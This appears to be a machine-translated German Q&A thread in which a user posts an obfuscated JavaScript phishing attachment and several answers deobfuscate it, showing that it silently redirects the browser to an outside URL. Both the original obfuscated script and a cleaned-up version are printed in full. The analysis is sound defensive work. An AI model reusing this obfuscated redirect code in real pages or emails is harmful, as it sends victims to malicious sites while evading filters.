Was macht dieser verdächtige Phishing-Code?

Question

Einige meiner Nicht-IT-Mitarbeiter haben eine .html-Anlage in einer E-Mail-Nachricht geöffnet, die äußerst verdächtig aussieht. Es führte zu einem leeren Bildschirm, wenn es scheint, dass etwas JavaScript-Code ausgeführt wurde.

<script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> 

Was hat es getan? Das geht über meine Programmierkenntnisse hinaus.

Answer 1

Es wird auf eine URL weitergeleitet, 'http://lendermedia.com/images/z.htm' (folgen Sie auf eigene Gefahr).

Kopieren Sie den Code und fügen Sie ihn in einen geeigneten JavaScript-Editor ein und formatieren Sie die Quelle für Sie.

Kernpunkte:

var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, ''); 

h wird gleich 'http://lendermedia.com/images/z.htm'

t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; 

t einen Verweis auf document.location

b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; 

Die Eigenschaft namens href vonenthalten, die an dieser Stelle (innerhalb einer anderen Funktion) wirklich t aus der obigen Anweisung ist, wird auf h gesetzt, was die URL ist.

Der meiste Code nur Rauschen ist, besteht die eigentliche Funktionalität dieser:

function uK() { 
}; 
uK.prototype = { 
    f : function() { 
    var h = 'hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^' 
     .replace(/[\^H\!9X]/g, ''); 
    t = document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')]; 
    function x(b) { 
     b['hIrBeTf.'.replace(/[\.BTAI]/g, '')] = h; 
    } 
    x(t); 
    } 
}; 
var tL = new uK(); 
tL.f(); 

Answer 2

Minus der Verschleierung, tut es so etwas wie document.location.href="http://lendermedia.com/images/z.htm"

Answer 3

Key Teil zu verstehen, dass Code ist der replace(/[\^H\!9X]/g, '') Teile. Wenn das zweite Argument für die Ersetzung '' ist, dann entfernt es lediglich Dinge aus der vorherigen Zeichenfolge.

Wirklich unelegante Art, Dinge zu verschleiern. Wahrscheinlich ist das Ziel nur zufällig für jeden Benutzer zu sein und Bayessche Spamfilter zu vermeiden.

Answer 4

Ich stieß auf das gleiche Problem, und dann diese Seite gefunden. Nachdem ich ein WHOIS für die Kontaktinformationen gemacht hatte, kontaktierte ich den Besitzer von lendermedia.com, der gerade herausgefunden hatte, dass seine Seite die z.htm Seite ohne sein Wissen und gegen seine Wünsche hostet. Als ich ihn kontaktierte, konnte ich sein /images/ Verzeichnis durchsuchen. Er hat seitdem die Berechtigungen geändert. All das zu sagen, dass es scheint, dass dieser Typ sauber ist, aber das ist für Sie zu entscheiden.